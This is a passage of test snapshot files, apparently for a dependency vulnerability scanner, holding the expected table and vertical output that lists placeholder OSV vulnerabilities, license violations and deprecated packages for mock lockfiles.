╭───────────────────────┬──────┬───────────┬─────────┬─────────┬────────────── ≈ │ OSV URL │ CVSS │ ECOSYSTEM │ PACKAGE │ VERSION │ FIXED VERSION ≈ ├───────────────────────┼──────┼───────────┼─────────┼─────────┼────────────── ≈ │ https://osv.dev/OSV-1 │ │ npm │ mine1 │ 1.2.3 │ -- ≈ │ https://osv.dev/OSV-2 │ │ npm │ mine2 │ │ -- ≈ │ https://osv.dev/OSV-1 │ │ npm │ mine1 │ 1.2.3 │ -- ≈ ╰───────────────────────┴──────┴───────────┴─────────┴─────────┴────────────── ≈ ╭───────────────────┬───────────┬─────────┬─────────┬───────────────────────── ≈ │ LICENSE VIOLATION │ ECOSYSTEM │ PACKAGE │ VERSION │ SOURCE ≈ ├───────────────────┼───────────┼─────────┼─────────┼───────────────────────── ≈ │ MIT │ npm │ mine1 │ 1.2.3 │ path/to/my/first/lockfil ≈ │ MIT │ npm │ mine1 │ 1.3.5 │ path/to/my/third/lockfil ≈ │ Apache-2.0 │ npm │ mine1 │ 1.2.3 │ path/to/my/third/lockfil ≈ ╰───────────────────┴───────────┴─────────┴─────────┴───────────────────────── ≈ --- [TestPrintTableResults_StandardTerminalWidth_WithMixedIssues/one_source_in_working_directory_with_one_package,_one_vulnerability,_and_one_license_violation - 1] Total 1 package affected by 1 known vulnerability (0 Critical, 0 High, 0 Medium, 0 Low, 1 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. 
╭───────────────────────┬──────┬───────────┬─────────┬─────────┬────────────── ≈ │ OSV URL │ CVSS │ ECOSYSTEM │ PACKAGE │ VERSION │ FIXED VERSION ≈ ├───────────────────────┼──────┼───────────┼─────────┼─────────┼────────────── ≈ │ https://osv.dev/OSV-1 │ │ npm │ mine1 │ 1.2.3 │ -- ≈ ╰───────────────────────┴──────┴───────────┴─────────┴─────────┴────────────── ≈ ╭───────────────────┬───────────┬─────────┬─────────┬───────────────────────── ≈ │ LICENSE VIOLATION │ ECOSYSTEM │ PACKAGE │ VERSION │ SOURCE ≈ ├───────────────────┼───────────┼─────────┼─────────┼───────────────────────── ≈ │ MIT │ npm │ mine1 │ 1.2.3 │ path/to/my/first/lockfil ≈ ╰───────────────────┴───────────┴─────────┴─────────┴───────────────────────── ≈ --- [TestPrintTableResults_StandardTerminalWidth_WithMixedIssues/one_source_with_one_deprecated_package - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. Total 1 package deprecated. ╭─────────────────────────────────────────────────────────╮ │ Deprecated packages │ ├───────────┬────────────────┬─────────┬──────────────────┤ │ ECOSYSTEM │ PACKAGE │ VERSION │ SOURCE │ ├───────────┼────────────────┼─────────┼──────────────────┤ │ npm │ deprecated-pkg │ 1.0.0 │ path/to/lockfile │ ╰───────────┴────────────────┴─────────┴──────────────────╯ --- [TestPrintTableResults_StandardTerminalWidth_WithMixedIssues/one_source_with_one_package,_one_called_vulnerability,_and_one_license_violation - 1] Total 1 package affected by 1 known vulnerability (0 Critical, 0 High, 0 Medium, 0 Low, 1 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. 
╭───────────────────────┬──────┬───────────┬─────────┬─────────┬────────────── ≈ │ OSV URL │ CVSS │ ECOSYSTEM │ PACKAGE │ VERSION │ FIXED VERSION ≈ ├───────────────────────┼──────┼───────────┼─────────┼─────────┼────────────── ≈ │ https://osv.dev/OSV-1 │ │ npm │ mine1 │ 1.2.3 │ -- ≈ ╰───────────────────────┴──────┴───────────┴─────────┴─────────┴────────────── ≈ ╭───────────────────┬───────────┬─────────┬─────────┬───────────────────────── ≈ │ LICENSE VIOLATION │ ECOSYSTEM │ PACKAGE │ VERSION │ SOURCE ≈ ├───────────────────┼───────────┼─────────┼─────────┼───────────────────────── ≈ │ MIT │ npm │ mine1 │ 1.2.3 │ path/to/my/first/lockfil ≈ ╰───────────────────┴───────────┴─────────┴─────────┴───────────────────────── ≈ --- [TestPrintTableResults_StandardTerminalWidth_WithMixedIssues/one_source_with_one_package,_one_uncalled_vulnerability,_and_one_license_violation - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. 
╭──────────────────────────┬──────┬───────────┬─────────┬─────────┬─────────── ≈ │ OSV URL │ CVSS │ ECOSYSTEM │ PACKAGE │ VERSION │ FIXED VERS ≈ ├──────────────────────────┼──────┼───────────┼─────────┼─────────┼─────────── ≈ │ Uncalled vulnerabilities │ │ │ │ │ ≈ ├──────────────────────────┼──────┼───────────┼─────────┼─────────┼─────────── ≈ │ https://osv.dev/OSV-1 │ │ npm │ mine1 │ 1.2.3 │ -- ≈ ╰──────────────────────────┴──────┴───────────┴─────────┴─────────┴─────────── ≈ ╭───────────────────┬───────────┬─────────┬─────────┬───────────────────────── ≈ │ LICENSE VIOLATION │ ECOSYSTEM │ PACKAGE │ VERSION │ SOURCE ≈ ├───────────────────┼───────────┼─────────┼─────────┼───────────────────────── ≈ │ MIT │ npm │ mine1 │ 1.2.3 │ path/to/my/first/lockfil ≈ ╰───────────────────┴───────────┴─────────┴─────────┴───────────────────────── ≈ --- [TestPrintTableResults_StandardTerminalWidth_WithMixedIssues/one_source_with_one_package,_one_vulnerability,_and_one_license_violation - 1] Total 1 package affected by 1 known vulnerability (0 Critical, 0 High, 0 Medium, 0 Low, 1 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. 
╭───────────────────────┬──────┬───────────┬─────────┬─────────┬────────────── ≈ │ OSV URL │ CVSS │ ECOSYSTEM │ PACKAGE │ VERSION │ FIXED VERSION ≈ ├───────────────────────┼──────┼───────────┼─────────┼─────────┼────────────── ≈ │ https://osv.dev/OSV-1 │ │ npm │ mine1 │ 1.2.3 │ -- ≈ ╰───────────────────────┴──────┴───────────┴─────────┴─────────┴────────────── ≈ ╭───────────────────┬───────────┬─────────┬─────────┬───────────────────────── ≈ │ LICENSE VIOLATION │ ECOSYSTEM │ PACKAGE │ VERSION │ SOURCE ≈ ├───────────────────┼───────────┼─────────┼─────────┼───────────────────────── ≈ │ MIT │ npm │ mine1 │ 1.2.3 │ path/to/my/first/lockfil ≈ ╰───────────────────┴───────────┴─────────┴─────────┴───────────────────────── ≈ --- [TestPrintTableResults_StandardTerminalWidth_WithMixedIssues/two_sources_with_packages,_one_vulnerability,_one_license_violation - 1] Total 1 package affected by 1 known vulnerability (0 Critical, 0 High, 0 Medium, 0 Low, 1 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. 
╭───────────────────────┬──────┬───────────┬─────────┬─────────┬────────────── ≈ │ OSV URL │ CVSS │ ECOSYSTEM │ PACKAGE │ VERSION │ FIXED VERSION ≈ ├───────────────────────┼──────┼───────────┼─────────┼─────────┼────────────── ≈ │ https://osv.dev/OSV-1 │ │ npm │ mine1 │ 1.2.3 │ -- ≈ ╰───────────────────────┴──────┴───────────┴─────────┴─────────┴────────────── ≈ ╭───────────────────┬───────────┬─────────┬─────────┬───────────────────────── ≈ │ LICENSE VIOLATION │ ECOSYSTEM │ PACKAGE │ VERSION │ SOURCE ≈ ├───────────────────┼───────────┼─────────┼─────────┼───────────────────────── ≈ │ MIT │ npm │ mine2 │ 5.9.0 │ path/to/my/second/lockfi ≈ ╰───────────────────┴───────────┴─────────┴─────────┴───────────────────────── ≈ --- [TestPrintTableResults_StandardTerminalWidth_WithVulnerabilities/multiple_sources_with_a_mixed_count_of_grouped_packages,_and_multiple_vulnerabilities - 1] Total 4 packages affected by 6 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 6 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. ╭───────────────────────┬──────┬───────────┬─────────────┬─────────┬────────── ≈ │ OSV URL │ CVSS │ ECOSYSTEM │ PACKAGE │ VERSION │ FIXED VER ≈ ├───────────────────────┼──────┼───────────┼─────────────┼─────────┼────────── ≈ │ https://osv.dev/OSV-1 │ │ npm │ mine1 │ 1.2.2 │ -- ≈ │ https://osv.dev/OSV-1 │ │ npm │ mine1 (dev) │ 1.2.3 │ -- ≈ │ https://osv.dev/OSV-5 │ │ npm │ mine1 (dev) │ 1.2.3 │ -- ≈ │ https://osv.dev/OSV-2 │ │ npm │ mine2 (dev) │ 3.2.5 │ -- ≈ │ https://osv.dev/OSV-3 │ │ npm │ mine3 │ 0.4.1 │ -- ≈ │ https://osv.dev/OSV-5 │ │ npm │ mine3 │ 0.4.1 │ -- ≈ ╰───────────────────────┴──────┴───────────┴─────────────┴─────────┴────────── ≈ --- [TestPrintTableResults_StandardTerminalWidth_WithVulnerabilities/multiple_sources_with_a_mixed_count_of_packages,_and_multiple_vulnerabilities - 1] Total 4 packages affected by 6 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 6 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. 
╭───────────────────────┬──────┬───────────┬─────────┬─────────┬────────────── ≈ │ OSV URL │ CVSS │ ECOSYSTEM │ PACKAGE │ VERSION │ FIXED VERSION ≈ ├───────────────────────┼──────┼───────────┼─────────┼─────────┼────────────── ≈ │ https://osv.dev/OSV-1 │ │ npm │ mine1 │ 1.2.2 │ -- ≈ │ https://osv.dev/OSV-1 │ │ npm │ mine1 │ 1.2.3 │ -- ≈ │ https://osv.dev/OSV-5 │ │ npm │ mine1 │ 1.2.3 │ -- ≈ │ https://osv.dev/OSV-2 │ │ npm │ mine2 │ 3.2.5 │ -- ≈ │ https://osv.dev/OSV-3 │ │ npm │ mine3 │ 0.4.1 │ -- ≈ │ https://osv.dev/OSV-5 │ │ npm │ mine3 │ 0.4.1 │ -- ≈ ╰───────────────────────┴──────┴───────────┴─────────┴─────────┴────────────── ≈ --- [TestPrintTableResults_StandardTerminalWidth_WithVulnerabilities/multiple_sources_with_a_mixed_count_of_packages,_no_vulnerabilities - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. --- [TestPrintTableResults_StandardTerminalWidth_WithVulnerabilities/multiple_sources_with_a_mixed_count_of_packages,_some_vulnerabilities - 1] Total 3 packages affected by 3 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 3 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. ╭───────────────────────┬──────┬───────────┬─────────┬─────────┬────────────── ≈ │ OSV URL │ CVSS │ ECOSYSTEM │ PACKAGE │ VERSION │ FIXED VERSION ≈ ├───────────────────────┼──────┼───────────┼─────────┼─────────┼────────────── ≈ │ https://osv.dev/OSV-1 │ │ npm │ mine1 │ 1.2.3 │ -- ≈ │ https://osv.dev/OSV-2 │ │ npm │ mine2 │ 3.2.5 │ -- ≈ │ https://osv.dev/OSV-1 │ │ npm │ mine1 │ 1.2.3 │ -- ≈ ╰───────────────────────┴──────┴───────────┴─────────┴─────────┴────────────── ≈ --- [TestPrintTableResults_StandardTerminalWidth_WithVulnerabilities/multiple_sources_with_a_mixed_count_of_packages_across_ecosystems,_and_multiple_vulnerabilities - 1] Total 4 packages affected by 6 known vulnerabilities (0 Critical, 0 High, 1 Medium, 0 Low, 5 Unknown) from 3 ecosystems. 
0 vulnerabilities can be fixed. ╭───────────────────────┬──────┬───────────┬───────────────┬─────────┬──────── ≈ │ OSV URL │ CVSS │ ECOSYSTEM │ PACKAGE │ VERSION │ FIXED V ≈ ├───────────────────────┼──────┼───────────┼───────────────┼─────────┼──────── ≈ │ https://osv.dev/OSV-2 │ │ NuGet │ mine2 │ 3.2.5 │ -- ≈ │ https://osv.dev/OSV-1 │ │ Packagist │ author1/mine1 │ 1.2.3 │ -- ≈ │ https://osv.dev/OSV-5 │ │ Packagist │ author1/mine1 │ 1.2.3 │ -- ≈ │ https://osv.dev/OSV-3 │ 4.3 │ Packagist │ author3/mine3 │ 0.4.1 │ -- ≈ │ https://osv.dev/OSV-5 │ │ Packagist │ author3/mine3 │ 0.4.1 │ -- ≈ │ https://osv.dev/OSV-1 │ │ npm │ mine1 │ 1.2.2 │ -- ≈ ╰───────────────────────┴──────┴───────────┴───────────────┴─────────┴──────── ≈ --- [TestPrintTableResults_StandardTerminalWidth_WithVulnerabilities/multiple_sources_with_a_mixed_count_of_packages_across_ecosystems,_and_multiple_vulnerabilities,_but_some_uncalled - 1] Total 4 packages affected by 5 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 5 Unknown) from 3 ecosystems. 0 vulnerabilities can be fixed. 
╭──────────────────────────┬──────┬───────────┬───────────────┬─────────┬───── ≈ │ OSV URL │ CVSS │ ECOSYSTEM │ PACKAGE │ VERSION │ FIXE ≈ ├──────────────────────────┼──────┼───────────┼───────────────┼─────────┼───── ≈ │ https://osv.dev/OSV-2 │ │ NuGet │ mine2 │ 3.2.5 │ -- ≈ │ https://osv.dev/OSV-5 │ │ Packagist │ author1/mine1 │ 1.2.3 │ -- ≈ │ https://osv.dev/OSV-3 │ │ Packagist │ author3/mine3 │ 0.4.1 │ -- ≈ │ https://osv.dev/OSV-5 │ │ Packagist │ author3/mine3 │ 0.4.1 │ -- ≈ │ https://osv.dev/OSV-1 │ │ npm │ mine1 │ 1.2.2 │ -- ≈ ├──────────────────────────┼──────┼───────────┼───────────────┼─────────┼───── ≈ │ Uncalled vulnerabilities │ │ │ │ │ ≈ ├──────────────────────────┼──────┼───────────┼───────────────┼─────────┼───── ≈ │ https://osv.dev/OSV-1 │ │ Packagist │ author1/mine1 │ 1.2.3 │ -- ≈ ╰──────────────────────────┴──────┴───────────┴───────────────┴─────────┴───── ≈ --- [TestPrintTableResults_StandardTerminalWidth_WithVulnerabilities/multiple_sources_with_a_mixed_count_of_packages_across_ecosystems_using_commits_and_version,_and_multiple_vulnerabilities - 1] Total 4 packages affected by 6 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 6 Unknown) from 3 ecosystems. 0 vulnerabilities can be fixed. 
╭───────────────────────┬──────┬───────────┬───────────────┬─────────┬──────── ≈ │ OSV URL │ CVSS │ ECOSYSTEM │ PACKAGE │ VERSION │ FIXED V ≈ ├───────────────────────┼──────┼───────────┼───────────────┼─────────┼──────── ≈ │ https://osv.dev/OSV-2 │ │ NuGet │ mine2 │ 3.2.5 │ -- ≈ │ https://osv.dev/OSV-1 │ │ Packagist │ author1/mine1 │ 1.2.3 │ -- ≈ │ https://osv.dev/OSV-5 │ │ Packagist │ author1/mine1 │ 1.2.3 │ -- ≈ │ https://osv.dev/OSV-3 │ │ Packagist │ author3/mine3 │ 0.4.1 │ -- ≈ │ https://osv.dev/OSV-5 │ │ Packagist │ author3/mine3 │ 0.4.1 │ -- ≈ │ https://osv.dev/OSV-1 │ │ npm │ mine1 │ │ -- ≈ ╰───────────────────────┴──────┴───────────┴───────────────┴─────────┴──────── ≈ --- [TestPrintTableResults_StandardTerminalWidth_WithVulnerabilities/multiple_sources_with_no_packages - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. --- [TestPrintTableResults_StandardTerminalWidth_WithVulnerabilities/no_sources - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 0 ecosystems. 0 vulnerabilities can be fixed. --- [TestPrintTableResults_StandardTerminalWidth_WithVulnerabilities/one_source_with_no_packages - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. --- [TestPrintTableResults_StandardTerminalWidth_WithVulnerabilities/one_source_with_one_package,_no_vulnerabilities - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. --- [TestPrintTableResults_StandardTerminalWidth_WithVulnerabilities/one_source_with_one_package,_one_uncalled_vulnerability,_and_one_called_vulnerability - 1] Total 1 package affected by 1 known vulnerability (0 Critical, 0 High, 0 Medium, 0 Low, 1 Unknown) from 1 ecosystem. 
0 vulnerabilities can be fixed. ╭──────────────────────────┬──────┬───────────┬─────────┬─────────┬─────────── ≈ │ OSV URL │ CVSS │ ECOSYSTEM │ PACKAGE │ VERSION │ FIXED VERS ≈ ├──────────────────────────┼──────┼───────────┼─────────┼─────────┼─────────── ≈ │ https://osv.dev/OSV-1 │ │ npm │ mine1 │ 1.2.3 │ -- ≈ ├──────────────────────────┼──────┼───────────┼─────────┼─────────┼─────────── ≈ │ Uncalled vulnerabilities │ │ │ │ │ ≈ ├──────────────────────────┼──────┼───────────┼─────────┼─────────┼─────────── ≈ │ https://osv.dev/GHSA-123 │ │ npm │ mine1 │ 1.2.3 │ -- ≈ ╰──────────────────────────┴──────┴───────────┴─────────┴─────────┴─────────── ≈ --- [TestPrintTableResults_StandardTerminalWidth_WithVulnerabilities/one_source_with_one_package,_one_vulnerability,_and_a_max_severity - 1] Total 1 package affected by 1 known vulnerability (1 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. ╭───────────────────────┬──────┬───────────┬─────────┬─────────┬────────────── ≈ │ OSV URL │ CVSS │ ECOSYSTEM │ PACKAGE │ VERSION │ FIXED VERSION ≈ ├───────────────────────┼──────┼───────────┼─────────┼─────────┼────────────── ≈ │ https://osv.dev/OSV-1 │ 9 │ npm │ mine1 │ 1.2.3 │ -- ≈ ╰───────────────────────┴──────┴───────────┴─────────┴─────────┴────────────── ≈ --- [TestPrintTableResults_StandardTerminalWidth_WithVulnerabilities/one_source_with_one_package_and_one_called_vulnerability - 1] Total 1 package affected by 1 known vulnerability (0 Critical, 0 High, 0 Medium, 0 Low, 1 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. 
╭───────────────────────┬──────┬───────────┬─────────┬─────────┬────────────── ≈ │ OSV URL │ CVSS │ ECOSYSTEM │ PACKAGE │ VERSION │ FIXED VERSION ≈ ├───────────────────────┼──────┼───────────┼─────────┼─────────┼────────────── ≈ │ https://osv.dev/OSV-1 │ │ npm │ mine1 │ 1.2.3 │ -- ≈ ╰───────────────────────┴──────┴───────────┴─────────┴─────────┴────────────── ≈ --- [TestPrintTableResults_StandardTerminalWidth_WithVulnerabilities/one_source_with_one_package_and_one_uncalled_vulnerability - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. ╭──────────────────────────┬──────┬───────────┬─────────┬─────────┬─────────── ≈ │ OSV URL │ CVSS │ ECOSYSTEM │ PACKAGE │ VERSION │ FIXED VERS ≈ ├──────────────────────────┼──────┼───────────┼─────────┼─────────┼─────────── ≈ │ Uncalled vulnerabilities │ │ │ │ │ ≈ ├──────────────────────────┼──────┼───────────┼─────────┼─────────┼─────────── ≈ │ https://osv.dev/OSV-1 │ │ npm │ mine1 │ 1.2.3 │ -- ≈ ╰──────────────────────────┴──────┴───────────┴─────────┴─────────┴─────────── ≈ --- [TestPrintTableResults_StandardTerminalWidth_WithVulnerabilities/one_source_with_one_package_and_one_vulnerability - 1] Total 1 package affected by 1 known vulnerability (0 Critical, 0 High, 0 Medium, 0 Low, 1 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. 
╭───────────────────────┬──────┬───────────┬─────────┬─────────┬────────────── ≈ │ OSV URL │ CVSS │ ECOSYSTEM │ PACKAGE │ VERSION │ FIXED VERSION ≈ ├───────────────────────┼──────┼───────────┼─────────┼─────────┼────────────── ≈ │ https://osv.dev/OSV-1 │ │ npm │ mine1 │ 1.2.3 │ -- ≈ ╰───────────────────────┴──────┴───────────┴─────────┴─────────┴────────────── ≈ --- [TestPrintTableResults_StandardTerminalWidth_WithVulnerabilities/one_source_with_one_package_and_one_vulnerability_(dev) - 1] Total 1 package affected by 1 known vulnerability (0 Critical, 0 High, 0 Medium, 0 Low, 1 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. ╭───────────────────────┬──────┬───────────┬─────────────┬─────────┬────────── ≈ │ OSV URL │ CVSS │ ECOSYSTEM │ PACKAGE │ VERSION │ FIXED VER ≈ ├───────────────────────┼──────┼───────────┼─────────────┼─────────┼────────── ≈ │ https://osv.dev/OSV-1 │ │ npm │ mine1 (dev) │ 1.2.3 │ -- ≈ ╰───────────────────────┴──────┴───────────┴─────────────┴─────────┴────────── ≈ --- [TestPrintTableResults_StandardTerminalWidth_WithVulnerabilities/one_source_with_one_package_and_two_aliases_of_a_single_uncalled_vulnerability - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. 
╭──────────────────────────┬──────┬───────────┬─────────┬─────────┬─────────── ≈ │ OSV URL │ CVSS │ ECOSYSTEM │ PACKAGE │ VERSION │ FIXED VERS ≈ ├──────────────────────────┼──────┼───────────┼─────────┼─────────┼─────────── ≈ │ Uncalled vulnerabilities │ │ │ │ │ ≈ ├──────────────────────────┼──────┼───────────┼─────────┼─────────┼─────────── ≈ │ https://osv.dev/OSV-1 │ │ npm │ mine1 │ 1.2.3 │ -- ≈ │ https://osv.dev/GHSA-123 │ │ │ │ │ ≈ ╰──────────────────────────┴──────┴───────────┴─────────┴─────────┴─────────── ≈ --- [TestPrintTableResults_StandardTerminalWidth_WithVulnerabilities/one_source_with_one_package_and_two_aliases_of_a_single_vulnerability_with_a_max_severity - 1] Total 1 package affected by 1 known vulnerability (0 Critical, 1 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. ╭──────────────────────────┬──────┬───────────┬─────────┬─────────┬─────────── ≈ │ OSV URL │ CVSS │ ECOSYSTEM │ PACKAGE │ VERSION │ FIXED VERS ≈ ├──────────────────────────┼──────┼───────────┼─────────┼─────────┼─────────── ≈ │ https://osv.dev/OSV-1 │ 8.3 │ npm │ mine1 │ 1.2.3 │ -- ≈ │ https://osv.dev/GHSA-123 │ │ │ │ │ ≈ ╰──────────────────────────┴──────┴───────────┴─────────┴─────────┴─────────── ≈ --- [TestPrintTableResults_StandardTerminalWidth_WithVulnerabilities/one_source_with_one_package_and_two_aliases_of_a_single_vulnerability_without_a_max_severity - 1] Total 1 package affected by 1 known vulnerability (0 Critical, 0 High, 0 Medium, 0 Low, 1 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. 
╭──────────────────────────┬──────┬───────────┬─────────┬─────────┬─────────── ≈ │ OSV URL │ CVSS │ ECOSYSTEM │ PACKAGE │ VERSION │ FIXED VERS ≈ ├──────────────────────────┼──────┼───────────┼─────────┼─────────┼─────────── ≈ │ https://osv.dev/OSV-1 │ │ npm │ mine1 │ 1.2.3 │ -- ≈ │ https://osv.dev/GHSA-123 │ │ │ │ │ ≈ ╰──────────────────────────┴──────┴───────────┴─────────┴─────────┴─────────── ≈ --- [TestPrintTableResults_StandardTerminalWidth_WithVulnerabilities/one_source_with_one_package_with_both_a_version_and_commit_and_one_vulnerability - 1] Total 1 package affected by 1 known vulnerability (0 Critical, 0 High, 0 Medium, 0 Low, 1 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. ╭───────────────────────┬──────┬───────────┬─────────┬─────────┬────────────── ≈ │ OSV URL │ CVSS │ ECOSYSTEM │ PACKAGE │ VERSION │ FIXED VERSION ≈ ├───────────────────────┼──────┼───────────┼─────────┼─────────┼────────────── ≈ │ https://osv.dev/OSV-1 │ │ npm │ mine1 │ 1.2.3 │ -- ≈ ╰───────────────────────┴──────┴───────────┴─────────┴─────────┴────────────── ≈ --- [TestPrintTableResults_StandardTerminalWidth_WithVulnerabilities/one_source_with_one_package_with_just_a_commit_and_one_vulnerability - 1] Total 1 package affected by 1 known vulnerability (0 Critical, 0 High, 0 Medium, 0 Low, 1 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. ╭───────────────────────┬──────┬───────────┬─────────┬─────────┬────────────── ≈ │ OSV URL │ CVSS │ ECOSYSTEM │ PACKAGE │ VERSION │ FIXED VERSION ≈ ├───────────────────────┼──────┼───────────┼─────────┼─────────┼────────────── ≈ │ https://osv.dev/OSV-1 │ │ npm │ mine1 │ │ -- ≈ ╰───────────────────────┴──────┴───────────┴─────────┴─────────┴────────────── ≈ --- [TestPrintTableResults_StandardTerminalWidth_WithVulnerabilities/one_source_with_vulnerabilities,_some_missing_content - 1] Total 2 packages affected by 2 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 2 Unknown) from 1 ecosystem. 
0 vulnerabilities can be fixed. ╭───────────────────────┬──────┬───────────┬─────────┬───────────┬──────────── ≈ │ OSV URL │ CVSS │ ECOSYSTEM │ PACKAGE │ VERSION │ FIXED VERSI ≈ ├───────────────────────┼──────┼───────────┼─────────┼───────────┼──────────── ≈ │ https://osv.dev/OSV-1 │ │ npm │ mine1 │ 1.2.3 │ -- ≈ │ https://osv.dev/OSV-2 │ │ npm │ mine3 │ 0.10.2-rc │ -- ≈ ╰───────────────────────┴──────┴───────────┴─────────┴───────────┴──────────── ≈ --- [TestPrintTableResults_StandardTerminalWidth_WithVulnerabilities/two_sources_with_packages,_one_vulnerability - 1] Total 1 package affected by 1 known vulnerability (0 Critical, 0 High, 0 Medium, 0 Low, 1 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. ╭───────────────────────┬──────┬───────────┬─────────┬─────────┬────────────── ≈ │ OSV URL │ CVSS │ ECOSYSTEM │ PACKAGE │ VERSION │ FIXED VERSION ≈ ├───────────────────────┼──────┼───────────┼─────────┼─────────┼────────────── ≈ │ https://osv.dev/OSV-1 │ │ npm │ mine1 │ 1.2.3 │ -- ≈ ╰───────────────────────┴──────┴───────────┴─────────┴─────────┴────────────── ≈ --- [TestPrintTableResults_StandardTerminalWidth_WithVulnerabilities/two_sources_with_the_same_vulnerable_package - 1] Total 2 packages affected by 2 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 2 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. 
╭───────────────────────┬──────┬───────────┬─────────────┬─────────┬────────── ≈ │ OSV URL │ CVSS │ ECOSYSTEM │ PACKAGE │ VERSION │ FIXED VER ≈ ├───────────────────────┼──────┼───────────┼─────────────┼─────────┼────────── ≈ │ https://osv.dev/OSV-1 │ │ npm │ mine1 │ 1.2.3 │ -- ≈ │ https://osv.dev/OSV-1 │ │ npm │ mine1 (dev) │ 1.2.3 │ -- ≈ ╰───────────────────────┴──────┴───────────┴─────────────┴─────────┴────────── ≈ --- ================================================ FILE: internal/output/__snapshots__/vertical_test.snap ================================================ [TestPrintVerticalResults_WithLicenseViolations/multiple_sources_with_a_mixed_count_of_packages,_no_license_violations - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. npm lockfile:/path/to/my/first/lockfile: found 0 packages with issues no known vulnerabilities found no license violations found sbom:/path/to/my/second/lockfile: found 0 packages with issues no known vulnerabilities found no license violations found unknown:/path/to/my/third/lockfile: found 0 packages with issues no known vulnerabilities found no license violations found --- [TestPrintVerticalResults_WithLicenseViolations/multiple_sources_with_a_mixed_count_of_packages,_some_license_violations - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. 
npm lockfile:/path/to/my/first/lockfile: found 0 packages with issues no known vulnerabilities found license violations found: mine1@1.2.3 (MIT) 1 license violation found in lockfile:/path/to/my/first/lockfile sbom:/path/to/my/second/lockfile: found 0 packages with issues no known vulnerabilities found license violations found: mine2@3.2.5 (Apache-2.0) 1 license violation found in sbom:/path/to/my/second/lockfile unknown:/path/to/my/third/lockfile: found 0 packages with issues no known vulnerabilities found license violations found: mine1@1.2.3 (MIT) 1 license violation found in unknown:/path/to/my/third/lockfile --- [TestPrintVerticalResults_WithLicenseViolations/multiple_sources_with_a_mixed_count_of_packages,_some_license_violations#01 - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. npm lockfile:/path/to/my/first/lockfile: found 0 packages with issues no known vulnerabilities found sbom:/path/to/my/second/lockfile: found 0 packages with issues no known vulnerabilities found unknown:/path/to/my/third/lockfile: found 0 packages with issues no known vulnerabilities found --- [TestPrintVerticalResults_WithLicenseViolations/multiple_sources_with_a_mixed_count_of_packages_across_ecosystems,_some_license_violations - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 3 ecosystems. 0 vulnerabilities can be fixed. 
NuGet unknown:/path/to/my/third/lockfile: found 0 packages with issues no known vulnerabilities found no license violations found Packagist lockfile:/path/to/my/first/lockfile: found 0 packages with issues no known vulnerabilities found license violations found: author1/mine1@1.2.3 (MIT) 1 license violation found in lockfile:/path/to/my/first/lockfile unknown:/path/to/my/third/lockfile: found 0 packages with issues no known vulnerabilities found license violations found: author1/mine1@1.2.3 (MIT) 1 license violation found in unknown:/path/to/my/third/lockfile npm sbom:/path/to/my/second/lockfile: found 0 packages with issues no known vulnerabilities found license violations found: mine2@3.2.5 (Apache-2.0) 1 license violation found in sbom:/path/to/my/second/lockfile --- [TestPrintVerticalResults_WithLicenseViolations/multiple_sources_with_a_mixed_count_of_packages_and_groups,_some_license_violations - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be 